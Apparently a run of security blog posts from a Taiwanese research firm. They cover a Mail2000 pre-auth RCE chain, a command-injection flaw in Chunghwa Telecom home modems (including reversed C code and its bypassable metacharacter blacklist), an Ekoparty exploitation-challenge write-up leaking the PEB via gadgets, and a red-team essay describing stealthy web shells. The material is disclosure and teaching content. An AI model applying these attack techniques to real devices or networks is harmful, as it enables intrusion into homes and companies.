這個 gadget 的作用在於,我們可以改變 stack 的位置,而剛好此時的 eax 指向內容是可控的,因此整個 stack 的內容都可以偽造,也就是說我們可以使用 ROP(Return-oriented programming) 來做利用!於是我們在偽造的 vtable 中設置了 stack 搬移的 gadget 以及後續利用的 ROP 攻擊鏈,進行 ROP 攻擊!

我們可以做 ROP,也就可以拿 shell 了對吧!你以為是這樣嗎?不,其實還有一個大問題,同樣導因於前面提到的防禦機制 ASLR – 我們沒有 system 的位置!這隻 binary 本身提供的 gadget 並不足以開啟一個 shell,因此我們希望可以直接利用 libc 當中的 system 來達成目的,但正如前面所提到的,記憶體位置每次載入都是隨機化的,我們並不知道 system 的確切位置! 經過我們仔細的觀察這支程式以後,我們發現了一件非常特別的事,這隻程式理論上是有打開 NX,也就是可寫段不可執行的保護機制 但是實際執行的時候,stack 的執行權限卻會被打開! 不論原因為何,這個設置對駭客來說是非常方便的,我們可以利用這個可執行段,將 shellcode 放上去執行,就可以成功得到 shell,達成 RCE!

然而,這個攻擊是需要登入的,對於追求完美的 DEVCORE 研究組來說,並不足夠!因此我們更進一步的研究了其它攻擊路徑!

Pre-Auth RCE - /cgi-bin/cgi_api

在搜索了所有 CGI 入口點以後,我們找到了一個不需要登入,同時又會呼叫 MCGI_VarClear() 的 CGI – /cgi-bin/cgi_api。一如其名,它就是一隻呼叫 API 的接口,因此程式本身非常的小,幾乎是呼叫完 library 就結束了,也因此不再有 stack pivot 的 gadget 可以利用。 這時,由於我們已經得知 stack 是可執行的,因此其實我們是可以跳過 ROP 這個步驟,直接將 shellcode 放置在 stack 上的,這裡利用到一個 CGI 的特性 – HTTP 的相關變數會放在環境變數中,像是下列這些常見變數:

  • HTTP_HOST
  • REQUEST_METHOD
  • QUERY_STRING

而環境變數事實上就是被放置在 stack 的最末端,也就是可執行段的位置,因此我們只要偽造 vtable 直接呼叫 shellcode 就可以了!

當然這時候同樣出現了一個問題:我們仍舊沒有 stack 的記憶體位置。這個時候有些人可能會陷入一個迷思,覺得攻擊就是要一次到位,像個狙擊手一樣一擊必殺,但實際上可能是這樣拿機關槍把敵人炸飛:

換個角度思考,這隻 binary 是 32 bits 的,因此這個位置有 1.5bytes 是隨機的,總共有 163 個可能的組合,所以其實平均只要 4096 次請求就可以撞到一次!這對於現在的電腦、網路速度來說其實也就是幾分鐘之間的事情,因此直接做暴力破解也是可行的!於是我們最終的 exploit 流程就是:

  1. 發送 POST 請求至 cgi_api
    • QUERY_STRING 中放入 shellcode
  2. 觸發越界寫入,覆蓋 file_vec
    • 在越界的參數準備偽造的 FILE & vtable
  3. cgi_api 結束前呼叫 MCGI_VarClear
  4. 跳至 vtable 上的 shellcode 位置,建立 reverse shell

最後我們成功寫出了不用認證的 RCE 攻擊鏈,並且這個 exploit 是不會因為 binary 的版本不同而受影響的!而在實際遇到的案例中也證明了這個 exploit 的可行性,我們曾在一次的演練當中,藉由 Mail2000 的這個 1day 作為突破口,成功洩漏目標的 VPN 資料,進一步往內網滲透!

漏洞修復

此漏洞已在 2018/05/08 發布的 Mail2000 V7 Patch 050 版本中完成修復。Patch 編號為 OF-ISAC-18-002、OF-ISAC-18-003。

後記

最後想來談談對於這些漏洞,廠商該用什麼樣的心態去面對。作為一個提供產品的廠商,Openfind 在這一次的漏洞處理中有幾個關鍵值得學習:

  • 心態開放
    • 主動提供測試環境
  • 積極修復漏洞
    • 面對漏洞以積極正向的態度,迅速處理
    • 修復完畢後,與提報者合作驗證
  • 重視客戶安全
    • 發布重大更新並主動通報客戶、協助更新

其實產品有漏洞是很正常也很難避免的事,而我們研究組是作為一個協助者的角色,期望能藉由回報漏洞幫助企業,提高資安意識並增進台灣的資安水平!希望廠商們也能以正向的態度來面對漏洞,而不是閃躲逃避,這樣只會令用戶們陷入更大的資安風險當中!

而對於使用各項設備的用戶,也應當掌握好屬於自己的資產,防火牆、伺服器等產品並不是購買來架設好以後就沒有問題了,做好資產盤點、追蹤廠商的安全性更新,才能確保產品不受到 1day 的攻擊!而定期進行滲透測試以及紅隊演練,更是可以幫助企業釐清自己是否有盲點、缺失,進而改善以降低企業資安風險。

你用它上網,我用它進你內網! 中華電信數據機遠端代碼執行漏洞

10 November 2019 at 16:00

大家好,我是 Orange! 這次的文章,是我在 DEVCORE CONFERENCE 2019 上所分享的議題,講述如何從中華電信的一個設定疏失,到串出可以掌控數十萬、甚至數百萬台的家用數據機漏洞!


前言

身為 DEVCORE 的研究團隊,我們的工作就是研究最新的攻擊趨勢、挖掘最新的弱點、找出可以影響整個世界的漏洞,回報給廠商避免這些漏洞流至地下黑市被黑帽駭客甚至國家級駭客組織利用,讓這個世界變得更加安全!

把「漏洞研究」當成工作,一直以來是許多資訊安全技術狂熱份子的夢想,但大部分的人只看到發表漏洞、或站上研討會時的光鮮亮麗,沒注意到背後所下的苦工,事實上,「漏洞研究」往往是一個非常樸實無華,且枯燥的過程。

漏洞挖掘並不像 Capture the Flag (CTF),一定存在著漏洞以及一個正確的解法等著你去解出,在題目的限定範圍下,只要根據現有的條件、線索去推敲出題者的意圖,十之八九可以找出問題點。 雖然還是有那種清新、優質、難到靠北的比賽例如 HITCON CTF 或是 Plaid CTF,不過 「找出漏洞」 與 「如何利用漏洞」在本質上已經是兩件不同的事情了!

CTF 很適合有一定程度的人精進自己的能力,但缺點也是如果經常在限制住的小框框內,思路及眼界容易被侷限住,真實世界的攻防往往更複雜、維度也更大! 要在一個成熟、已使用多年,且全世界資安人員都在關注的產品上挖掘出新弱點,可想而知絕對不是簡單的事! 一場 CTF 競賽頂多也就 48 小時,但在無法知道目標是否有漏洞的前提下,你能堅持多久?

在我們上一個研究中,發現了三個知名 SSL VPN 廠商中不用認證的遠端代碼執行漏洞,雖然成果豐碩,但也是花了整個研究組半年的時間(加上後續處理甚至可到一年),甚至在前兩個月完全是零產出、找不到漏洞下持續完成的。 所以對於一個好的漏洞研究人員,除了綜合能力、見識多寡以及能否深度挖掘外,還需要具備能夠獨立思考,以及興趣濃厚到耐得住寂寞等等特質,才有辦法在高難度的挑戰中殺出一條血路!

漏洞研究往往不是一間公司賺錢的項目,卻又是無法不投資的部門,有多少公司能夠允許員工半年、甚至一年去做一件不一定有產出的研究? 更何況是將研究成果無條件的回報廠商只是為了讓世界更加安全? 這也就是我們 DEVCORE 不論在滲透測試或是紅隊演練上比別人來的優秀的緣故,除了平日軍火庫的累積外,當遇到漏洞時,也會想盡辦法將這個漏洞的危害最大化,利用駭客思維、透過各種不同組合利用,將一個低風險漏洞利用到極致,這也才符合真實世界駭客對你的攻擊方式!


影響範圍

故事回到今年初的某天,我們 DEVCORE 的情資中心監控到全台灣有大量的網路地址開著 3097 連接埠,而且有趣的是,這些地址並不是什麼伺服器的地址,而是普通的家用電腦。 一般來說,家用電腦透過數據機連接上網際網路,對外絕不會開放任何服務,就算是數據機的 SSH 及 HTTP 管理介面,也只有內部網路才能訪問到,因此我們懷疑這與 ISP 的配置失誤有關! 我們也成功的在這個連接埠上挖掘出一個不用認證的遠端代碼執行漏洞! 打個比喻,就是駭客已經睡在你家客廳沙發的感覺!

透過這個漏洞我們可以完成:

  1. 竊聽網路流量,竊取網路身分、PTT 密碼,甚至你的信用卡資料
  2. 更新劫持、水坑式攻擊、內網中繼攻擊去控制你的電腦甚至個人手機
  3. 結合紅隊演練去繞過各種開發者的白名單政策
  4. 更多更多…

而相關的 CVE 漏洞編號為:


相較於以往對家用數據機的攻擊,這次的影響是更嚴重的! 以往就算漏洞再嚴重,只要家用數據機對外不開放任何連接埠,攻擊者也無法利用,但這次的漏洞包含中華電信的配置失誤,導致你家的數據機在網路上裸奔,攻擊者僅僅 「只要知道你的 IP 便可不需任何條件,直接進入你家內網」,而且,由於沒有數據機的控制權,所以這個攻擊一般用戶是無法防禦及修補的!


經過全網 IPv4 的掃瞄,全台灣約有 25 萬台的數據機存在此問題,「代表至少 25 萬個家庭受影響」,不過這個結果只在 「掃描當下有連上網路的數據機才被納入統計」,所以實際受害用戶一定大於這個數字!

而透過網路地址的反查,有高達九成的受害用戶是中華電信的動態 IP,而剩下的一成則包含固定制 IP 及其他電信公司,至於為何會有其他電信公司呢? 我們的理解是中華電信作為台灣最大電信商,所持有的資源以及硬體設施也是其他電信商遠遠不及的,因此在一些比較偏僻的地段可能其他電信商到使用者的最後一哩路也還是中華電信的設備! 由於我們不是廠商,無法得知完整受影響的數據機型號列表,但筆者也是受害者 ╮(╯_╰)╭,所以可以確定最多人使用的中華電信光世代 GPON 數據機 也在受影響範圍內!

(圖片擷自網路)


漏洞挖掘

只是一個配置失誤並不能說是什麼大問題,所以接下來我們希望能在這個服務上挖掘出更嚴重的漏洞! 軟體漏洞的挖掘,根據原始碼、執行檔以及 API 文件的有無可依序分為:

  • 黑箱測試
  • 灰箱測試
  • 白箱測試

在什麼都沒有的的狀況下,只能依靠經驗以及對系統的了解去猜測每個指令背後的實作、並找出漏洞。

黑箱測試

3097 連接埠提供了許多跟電信網路相關的指令,推測是中華電信給工程師遠端對數據機進行各種網路設定的除錯介面!


其中,可以透過 HELP 指令列出所有功能,其中我們發現了一個指令叫做 MISC ,看名字感覺就是把一堆不知道怎麼分類的指令歸類在這,而其中一個叫做 SCRIPT 吸引了我們! 它的參數為一個檔案名稱,執行後像是會把檔案當成 Shell Script 來執行,但在無法在遠端機器留下一個可控檔案的前提下,也無法透過這個指令取得任意代碼執行。 不過有趣的是,MISC SCRIPT 這個指令會將 STDERR 給顯示出來,因此可以透過這個特性去完成任意檔案讀取!


從黑箱進化成灰箱

在漏洞的利用上,無論是記憶體的利用、或是網路的滲透,不外乎都圍繞著對目標的讀(Read)、 寫(Write) 以及代碼執行(eXecute) 三個權限的取得,現在我們取得了第一個讀的權限,接下來呢?

除錯介面貌似跑在高權限使用者下,所以可以直接透過讀取系統密碼檔得到系統使用者管理登入的密碼雜湊!


透過對 root 使用者密碼雜湊的破解,我們成功的登入數據機 SSH 將「黑箱」轉化成「灰箱」! 雖然現在可以成功控制自己的數據機,但一般家用數據機對外是不會開放 SSH 服務的,為了達到可以「遠端」控制別人的數據機,我們還是得想辦法從 3097 這個服務拿到代碼的執行權限。


整個中華電信的數據機是一個跑在 MIPS 處理器架構上的嵌入式 Linux 系統,而 3097 服務則是由一個在 /usr/bin/omcimain 的二進位檔案來處理,整個檔案大小有將近 5MB,對逆向工程來說並不是一個小數目,但與黑箱測試相較之下,至少有了東西可以分析了真棒!

$ uname -a
Linux I-040GW.cht.com.tw 2.6.30.9-5VT #1 PREEMPT Wed Jul 31 15:40:34 CST 2019
[luna SDK V1.8.0] rlx GNU/Linux

$ netstat -anp | grep 3097
tcp        0      0 127.0.0.1:3097          0.0.0.0:*               LISTEN

$ ls -lh /usr/bin/omcimain
-rwxr-xr-x    1 root   root        4.6M Aug  1 13:40 /usr/bin/omcimain

$ file /usr/bin/omcimain
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), dynamically linked


從灰箱進化成白箱

現在,我們可以透過逆向工程了解每個指令背後的原理及實作了! 不過首先,逆向工程是一個痛苦且煩悶的經過,一個小小的程式可能就包含幾萬、甚至十幾萬行的組合語言代碼,因此這時挖洞的策略就變得很重要! 從功能面來看,感覺會存在命令注入相關的漏洞,因此先以功能實作為出發點開始挖掘!

整個 3097 服務的處理核心其實就是一個多層的 IF-ELSE 選項,每一個小框框對應的一個功能的實作,例如 cli_config_cmdline 就是對應 CONFIG 這條指令,因此我們搭配著 HELP 指令的提示一一往每個功能實作挖掘!


研究了一段時間,並沒有發現到什麼嚴重漏洞 :( 不過我們注意到,當所有指命都匹配失敗時,會進入到了一個 with_fallback 的函數,這個函數的主要目的是把匹配失敗的指令接到 /usr/bin/diag 後繼續執行!


with_fallback 大致邏輯如下,由於當時 Ghidra 尚未出現,所以這份原始碼是從閱讀 MIPS 組合語言慢慢還原回來的! 其中 s1 為輸入的指令,如果指令不在定義好的列表內以及指令中出現問號的話,就與 /usr/bin/diag 拼湊起來丟入 system 執行! 理所當然,為了防止命令注入等相關弱點,在丟入 system 前會先根據 BLACKLISTS 的列表檢查是否存在有害字元。

  char *input = util_trim(s1);
  if (input[0] == '\0' || input[0] == '#')
      return 0;

  while (SUB_COMMAND_LIST[i] != 0) {
      sub_cmd = SUB_COMMAND_LIST[i++];
      if (strncmp(input, sub_cmd, strlen(sub_cmd)) == 0)
          break;
  }

  if (SUB_COMMAND_LIST[i] == 0 && strchr(input, '?') == 0)
      return -10;

  // ...

  while (BLACKLISTS[i] != 0) {
      if (strchr(input, BLACKLISTS[i]) != 0) {
          util_fdprintf(fd, "invalid char '%c' in command\n", BLACKLISTS[i]);
          return -1;
      }
      i++;
  }

  snprintf(file_buf,  64, "/tmp/tmpfile.%d.%06ld", getpid(), random() % 1000000);
  snprintf(cmd_buf, 1024, "/usr/bin/diag %s > %s 2>/dev/null", input, file_buf);
  system(cmd_buf);


BLACKLISTS 定義如下:

char *BLACKLISTS = "|<>(){}`;";

如果是你的話,能想到如何繞過嗎?






答案很簡單,命令注入往往就是這麼的簡單且樸實無華!


這裡我們示範了如何從 PTT 知道受害者 IP 地址,到進入它數據機實現真正意義上的「指哪打哪」!



後記

故事到這邊差不多進入尾聲,整篇文章看似輕描淡寫,描述一個漏洞從發現到利用的整個經過,從結果論來說也許只是一個簡單的命令注入,但實際上中間所花的時間、走過的歪路是正在讀文章的你無法想像的,就像是在黑暗中走迷宮,在沒有走出迷宮前永遠不會知道自己正在走的這條路是不是通往目的正確道路!

挖掘出新的漏洞,並不是一件容易的事,尤其是在各式攻擊手法又已趨於成熟的今天,要想出全新的攻擊手法更是難上加難! 在漏洞研究的領域上,台灣尚未擁有足夠的能量,如果平常的挑戰已經滿足不了你,想體驗真實世界的攻防,歡迎加入與我們一起交流蕉流 :D


通報時程

  • 2019 年 07 月 28 日 - 透過 TWCERT/CC 回報中華電信
  • 2019 年 08 月 14 日 - 廠商回覆清查並修補設備中
  • 2019 年 08 月 27 日 - 廠商回覆九月初修補完畢
  • 2019 年 08 月 30 日 - 廠商回覆已完成受影響設備的韌體更新
  • 2019 年 09 月 11 日 - 廠商回覆部分用戶需派員更新, 延後公開時間
  • 2019 年 09 月 23 日 - 與 TWCERT/CC 確認可公開
  • 2019 年 09 月 25 日 - 發表至 DEVCORE CONFERENCE 2019
  • 2019 年 11 月 11 日 - 部落格文章釋出

BFS Ekoparty 2019 Exploitation Challenge - Override Banking Restrictions to get US Dollars

27 October 2019 at 10:48

FROM CRASH TO CODE EXECUTION

this is my first time giving a try into a windows x64 bits , and challenges offered by blue frost security

I’ve decided to give the 2019 BFS Exploitation Challenge a try. It is a Windows 64 bit executable\ for which an exploit is expected to work under Windows 10 Redstone 6

The Rules

  1. Bypass ASLR remotely
  2. 64-bit version exploitation
  3. Remote Execution

Inital Steps

we were given a windows binary only . this made me think, I cannot use any fuzzing technique because I dont know if it’s local or remote . let’s try doing some reverse engineering before, So I can understand what it is really doing.

Navigating through the main function , we notice that it is a remote application which listen to 54321

server

Identifying the Vulnerability

by disassembly the function , it is obvious that some checks need to bypassed in order to send send our payload correctly

checks

  1. if ( v6 == 16i64 )
  2. if ( *(_QWORD *)buf == ‘0x393130326F6B45’ )
  3. strcpy(buf, “Eko2019”);
  4. if ( size_data <= 512 )
  5. if ( (signed int)size_data % 8 )

the first validation our application is checking if our payload is equal to 16 bytes , then if buf is equal to 0x393130326F6B45 which trasnalte into 9102okE in hex. there is a strcpy that copy at the end of our payload Eko2019 , but we also have a size data validation which\ we cannot send more than 512 bytes , and it needs to be aligned correctly for 8 bytes. meaning we could send 8,16,24 so on

the “jle” instruction indicates a signed integer comparison, but later passed as unsigned which lead us an integer overflow

checks

after we successfully send a bigger payload, I notice it crashes after sending 229 bytes , but before that there is a instruction lea rcx, unk_7FF6A8A9E520, but what unk_7FF6A8A9E520 is holding or doing? after inspectioning deeper about this unk_7FF6A8A9E520 . we found there is an array with an offset of 256 with this structure

array_ret

the functionsub_7FF6A8A91000 will return our byte + 488B01C3C3C3C3h in this case 41 48 8B 01 C3 C3 C3 C3

this value will basically be used in the WriteProcessMemory(v2, sub_7FF7DD111000, &Buffer, 8ui64, &NumberOfBytesWritten); as buffer these to the function sub_7FF6A8A91000 as instructions allowing to control what we can execute when we reach it.

overwrite

we could see rax , and rcx was overwritten , but however rax was overwritten only one byte from the lower bytes, and rcx overwrite completely causing an access violation

.text:00007FF7DD111000 arg_0= qword ptr  8
.text:00007FF7DD111000
.text:00007FF7DD111000 db      42h
.text:00007FF7DD111000 mov     rax, [rcx]
.text:00007FF7DD111004 retn

why does this happen?

there’s a reason

  1. because of the value of the pointer of RCX that you control

Strategy

In order to bypass ASLR, we need to cause the server to leak an address that belongs to its process space. Fortunately, there is a call to the send() function , which sends 8 bytes of data, so exactly the size of a pointer in 64 bit land. That should serve our purpose just fine.

          qword_7FF7DD11D4E0 = printf(aRemoteMessageI, (unsigned int)counter_conection, &Dst);
          ++counter_conection;
          Buffer = what_the_heck_do(array[byte % -256]);
          v2 = GetCurrentProcess();
          WriteProcessMemory(v2, sub_7FF7DD111000, &Buffer, 8ui64, &NumberOfBytesWritten);
          *(_QWORD *)v3 = sub_7FF7DD111000(v9);
          send(s, v3, 8, 0);
          result = 1i64;

The strategy is getting control of the “byte” variable Luckily, it is a stack variable adjacent to the “size_data[512]” other than the default one at index 62 (0x3e).

I wrote a simple script to find gadgets in order to leak data from the running process

for i in $(cat file); do echo -e "\n$i" && rasm2 -b -D $i;done

after sometime research how I can read some information about the running process . I found what I could read via gs(segment register) because of x64 bits

0x65488B01C3C3C3C3
0x00000000   4                 65488b01  mov rax, qword gs:[rcx]
0x00000004   1                       c3  ret
0x00000005   1                       c3  ret
0x00000006   1                       c3  ret
0x00000007   1                       c3  ret

So this special register which could lead us to read _PEB , and our peb offset is at +0x060 ProcessEnvironmentBlock : Ptr64 _PEB via dt ntdll!_TEB

preparing our exploit

Leaking the PEB

  1. 0x65 = mov rax, qword gs:[rcx]
  2. 0x060 = _PEB
WINDBG>dt ntdll!_TEB
   +0x000 NtTib            : _NT_TIB
   +0x038 EnvironmentPointer : Ptr64 Void
   +0x040 ClientId         : _CLIENT_ID
   +0x050 ActiveRpcHandle  : Ptr64 Void
   +0x058 ThreadLocalStoragePointer : Ptr64 Void
   +0x060 ProcessEnvironmentBlock : Ptr64 _PEB
   +0x068 LastErrorValue   : Uint4B
   +0x06c CountOfOwnedCriticalSections : Uint4B
   +0x070 CsrClientThread  : Ptr64 Void
   +0x078 Win32ThreadInfo  : Ptr64 Void
   +0x080 User32Reserved   : [26] Uint4B

in order to make our exploit to leak the data . we need to find a way to derefence rcx with our _PEB offset\ So we can leak our PEB address to start leaking data to bypass ASLR

leak_peb

Leaking the ImageBaseAddress

WINDBG>dt ntdll!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged    : UChar
   +0x003 BitField         : UChar
   +0x003 ImageUsesLargePages : Pos 0, 1 Bit
   +0x003 IsProtectedProcess : Pos 1, 1 Bit
   +0x003 IsImageDynamicallyRelocated : Pos 2, 1 Bit
   +0x003 SkipPatchingUser32Forwarders : Pos 3, 1 Bit
   +0x003 IsPackagedProcess : Pos 4, 1 Bit
   +0x003 IsAppContainer   : Pos 5, 1 Bit
   +0x003 IsProtectedProcessLight : Pos 6, 1 Bit
   +0x003 IsLongPathAwareProcess : Pos 7, 1 Bit
   +0x004 Padding0         : [4] UChar
   +0x008 Mutant           : Ptr64 Void
   +0x010 ImageBaseAddress : Ptr64 Void this our value we want to leak now 
   +0x018 Ldr              : Ptr64 _PEB_LDR_DATA
   +0x020 ProcessParameters : Ptr64 _RTL_USER_PROCESS_PARAMETERS
   +0x028 SubSystemData    : Ptr64 Void
   +0x030 ProcessHeap      : Ptr64 Void
   +0x038 FastPebLock      : Ptr64 _RTL_CRITICAL_SECTION
   +0x040 AtlThunkSListPtr : Ptr64 _SLIST_HEADER
   +0x048 IFEOKey          : Ptr64 Void
   +0x050 CrossProcessFlags : Uint4B
   ....snip

Code execution

overwrite

DEVCORE 紅隊的進化,與下一步

23 October 2019 at 16:00

前言

「紅隊演練」近年來漸漸開始被大家提及,也開始有一些廠商推出紅隊服務。不過關於在台灣紅隊是怎麼做的就比較少人公開分享,身為第一個在台灣推紅隊演練的公司,我想就根據這兩年多來的實戰經驗,分享為什麼我們要做紅隊、我們面臨到的問題、以及在我們心中認為紅隊成員應該具備的特質。最後再分享我們現階段看到的企業資安問題,期望未來我們也可以透過紅隊演練來幫助企業補足那些問題。

這一篇是我在 DEVCORE CONFERENCE 2019 所分享的主題。研討會事前調查想聽內容時有些朋友希望我們能介紹 DEVCORE 的紅隊,還有運作方式和案例,所以我抽出一些素材整理成這場演講。下面是投影片連結,其中有些內部系統畫面不對外公開,僅在研討會分享敬請見諒。

DEVCORE 紅隊的進化,與下一步 - Shaolin (DEVCORE CONF 2019)

為什麼要紅隊演練?

一言以蔽之,就是我們漸漸體會到:對大企業而言,單純的滲透測試並不是最有效益的。從過去上百次滲透測試經驗中,我們往往能在專案初期的偵查階段,發現企業邊界存在嚴重弱點,進而進入內網繞過層層防禦攻擊主要目標。越是龐大的企業,這種狀況會越明顯,因為他們通常有很多對外的網站、網路設備,每一個都可能是風險,即使主要網站防護很完備,駭客只需要從這麼多目標中找到一個問題,就可以對企業造成傷害。今天就算企業對每個服務都獨立做了一次滲透測試,在真實世界中,還是有可能從第三方服務、廠商供應鏈、社交工程等途徑入侵。所以有可能投注很多資源做測試,結果還是發生資安事件。

於是,我們推出了紅隊演練,希望透過真實的演練幫助企業找到整體架構中脆弱的地方。因此,這個服務關注的是企業整體的安全性,而不再只是單一的網站。

紅隊演練目標通常是一個情境,例如:駭客有沒有辦法取得民眾個資甚至是信用卡卡號?在演練過程中紅隊會無所不用其極的嘗試驗證企業在乎的情境有沒有可能發生。以剛剛的例子來說,我們會想辦法找到一條路徑取得存放這些訊息的資料庫,去驗證有沒有辦法取得個資及卡號。一般來說,卡號部分都會經過加密,因此在拿下資料庫後我們也會嘗試看看有沒有辦法還原這些卡號。有時候除了找到還原的方法,我們甚至會在過程中發現其他路徑可取得卡號,可能是工程師的 debug 資訊會記錄卡號,或是備份檔在 NAS 裡面有完整卡號,這些可能是連資安負責人都不知道的資訊,也是企業評估風險的盲點。

到這邊,紅隊演練的效益就很明顯了,紅隊能協助企業全盤評估潛在的重大風險,不再像過去只是單一面向的測試特定網站。除了找到弱點,紅隊更在乎幫企業驗證入侵的可行性,方便企業評估風險以及擬定防禦策略。最後,紅隊往往也能夠在演練過程當中找出企業風險評估忽略的地方,例如剛剛例子提到的備份 NAS,就可能是沒有列入核心系統但又相當重要的伺服器,這一塊也是 DEVCORE 這幾年來確實幫助到客戶的地方。

DEVCORE 紅隊的編制

基本上,DEVCORE 的紅隊成員都是可以獨當一面的,在執行一般專案時成員間並沒有顯著差異。但在演練範圍比較大的狀況下,就會開始有明顯的分工作業,各組也會專精技能增加團隊效率。目前我們的編制共分為五組:

簡單介紹職責如下:

  • Intelligence (偵查),負責情報偵查,他們會去收集跟目標有關的所有資訊,包括 IP 網段、網站個別使用的技術,甚至是洩漏的帳號密碼。
  • Special Force (特攻),有比較強大的攻擊能力,主要負責打破現況,例如攻下第一個據點、拿下另一個網段、或是主機的提權。
  • Regular Army (常規),負責拿下據點後掃蕩整個戰場,嘗試橫向移動,會盡量多建立幾個據點讓特攻組有更多資源朝任務目標邁進。
  • Support (支援),重要的後勤工作,維持據點的可用性,同時也要觀察記錄整個戰況,最清楚全局戰況。
  • Research (研究),平時研究各種在紅隊中會用到的技術,演練時期碰到具戰略價值的系統,會投入資源開採 0-day。

DEVCORE 紅隊的進化

所謂的進化,就是碰到了問題,想辦法強化並且解決,那我們遇到了哪些問題呢?

如何找到一個突破點?

這是大家最常碰到的問題,萬事起頭難,怎麼樣找到第一個突破點?這個問題在紅隊演練當中難度會更高,因為有規模的企業早已投入資源在資安檢測和防護上,我們要怎麼樣從層層防禦當中找到弱點?要能找到別人找不到的弱點,測試思維和方法一定要跟別人不一樣。於是,我們投入資源在偵查、特攻、研究組:偵查部分研究了不同的偵查方法和來源,並且開發自己的工具讓偵查更有效率;我們的特攻組也不斷強化自己的攻擊能力;最重要的,我們讓研究人員開始針對我們常碰到的目標進行研究,開發紅隊會用到的工具或技巧。

這邊特別想要分享研究組的成果,因為我們會去開採一些基礎設施的 0-day,在負責任的揭露後,會將 1-day 用於演練中,這種模式對國外紅隊來說算是相當少見。為了能幫助到紅隊,研究組平時的研究方向,通常都是找企業外網可以碰到的通用服務,例如郵件伺服器、Jenkins、SSL VPN。我們找的弱點都是以不用認證、可取得伺服器控制權為優先,目前已公開的有:EximJenkinsPalo Alto GlobalProtectFortiGatePulse Secure。這些成果在演練當中都有非常非常高的戰略價值,甚至可以說掌控了這些伺服器幾乎就能間接控制企業的大半。

而這些研究成果,也意外的被國外所注意到:

  • PortSwigger 連續兩年年度十大網站攻擊技術評選冠軍 (2017, 2018)
  • 連續三年 DEFCON & Black Hat USA 發表 (2017, 2018, 2019)
  • 台灣第一個拿到 PWNIE AWARD 獎項:Pwnie for Best Server-Side Bug (年度最佳伺服器漏洞) (2018 入圍, 2019 得獎)

目標上萬台,如何發揮紅「隊」效益?

前面靠了偵查、特攻、研究組的成果取得了進入點。下一個問題,是在我們過去的經驗中,有過多次演練的範圍是上萬台電腦,我們要怎樣做才能發揮團隊作戰的效益呢?會有這個問題是因為數量級,如果範圍只有十個網站很容易找目標,但是當網站變多的時候,就很難標註討論我們要攻擊的目標。或是當大家要同步進度的時候,每個人的進度都很多,很難有個地方分享伺服器資訊,讓其他人能接續任務。

過去我們使用類似 Trello 的系統記錄每台伺服器的狀況,在範圍較小的時候很方便好用,但是當資料量一大就會顯得很難操作。

因此,我們自行開發了系統去解決相關問題。分享一些我們設計系統的必要原則供大家參考:

  • 伺服器列表可標籤、排序、全文搜尋,火力集中的伺服器必須要自動在顯眼處,省去額外搜尋時間。
  • 要可自動建立主機關係圖,方便團隊討論戰況。
  • 儲存結構化資訊而非過去的純字串,例如這台機器開的服務資訊、拿 shell 的方式、已滲透的帳號密碼。方便快速釐清目前進度以及事後分析。
  • 建立 shell 主控台,方便成員一鍵取得 shell 操作。

另外還有一個問題,紅隊成員這麼多,戰場又分散,如果想要把我們做過的測試過程記錄下來,不是會很複雜嗎?所以我們另外寫了 plugin 記錄 web 的攻擊流量、以及記錄我們在 shell 下過的指令和伺服器回傳的結果,這些記錄甚至比客戶的 access_log 和 bash_history 還詳細。此外,針對每個目標伺服器,我們也會特別記錄在上面所做過的重要行為,例如:改了什麼設定,新增或刪除了什麼檔案,方便我們還有客戶追蹤。要做這樣的客製化記錄其實是很繁瑣的,對那些習慣於自動化解決事情的駭客更是,但我們就是堅持做好這樣的紀錄,即使客戶沒有要求,我們還是會詳實記錄每個步驟,以備不時之需。

企業有防禦設備或機制?

解決了突破點和多人合作的問題,接下來我們面臨到第三個問題,企業有防護措施!在研討會中我舉了幾個較客製的真實防禦案例,說明我們除了常見的防禦設備外也擁有很多跟防禦機制交手的經驗。我們會研究每種防禦的特性加以繞過或利用,甚至會寫工具去躲避偵測,最近比較經典的是團隊做了在 Windows 伺服器上的 Web shell,它可以做到 WAF 抓不到,防毒軟體抓不到,也不會有 eventlog 記錄,利用這個工具可以無聲無息收集伺服器上我們需要的資料。當然,我們不是無敵的,一些較底層的偵測機制還是會無法繞過。這邊我直接講我們進化到目前的準則:在面對伺服器防禦機制,我們能隱匿的,一定做到絕對的隱匿,無法躲的,就把流程最佳化,縮短做事情的時間,例如控制在五分鐘內提權拿到關鍵資料,就算被別人抓到也沒關係,因為該拿的資料也拿到了。

紅隊成員應具備的特質

要能夠在紅隊演練中有突出成果,我覺得成員特質是滿關鍵的一個點。以下整理了幾個我從我們紅隊夥伴觀察到的特質跟大家分享,如果將來有打算從事紅隊工作,或是企業已經打算開始成立內部紅隊,這些特質可能可以作為一些參考。

想像力

第一個是想像力,為什麼會提這個特質,因為現在資安意識慢慢強化,要靠一招打天下是不太有機會的,尤其是紅隊演練這麼有變化的工作。要有成果一定要巧妙的組合利用或是繞過才有機會。

直接舉個例子,我們在公布 Pulse Secure VPN 的研究細節後,有人在 twitter 上表示那個關鍵用來 RCE 的 argument injection 點之前他有找到,只是無法利用所以官方也沒有修。確實我們找到的地方相同,不過我們靠想像力找到了一個可利用參數並搭配 Perl 的特性串出了 RCE。 另一個例子是 Jenkins 研究裡面的一環,我們在繞過身分認證之後發現有一個功能是在檢查使用者輸入的程式語法正不正確。伺服器怎樣去判斷語法正不正確?最簡單的方法就是直接去編譯看看,可以編譯成功就代表語法正確。所以我們研究了可以在『編譯階段』命令執行的方法,讓伺服器在嘗試判斷語法是否正確的同時執行我們的指令。這個手法過去沒有人提過,算是運用想像力的一個經典案例。

關於想像力,其實還有一個隱藏的前提:基礎功要夠。我一直認為想像力是知識的排列組合,例如剛剛的兩個例子,如果不知道 Perl 語法特性和 Meta-Programming 的知識,再怎麼天馬行空都是不可能成功 RCE 的。有基礎功再加上勇於聯想和嘗試,絕對是一個紅隊大將的必備特質。至於基礎功需要到什麼程度,對我們來說,講到一個漏洞,心中就會同時跳出一個樹狀圖:出現成因是什麼?相關的案例、漏洞、繞過方式都會啵啵啵跳出來,能做到這樣我想就已經是有所小成了。

追新技術

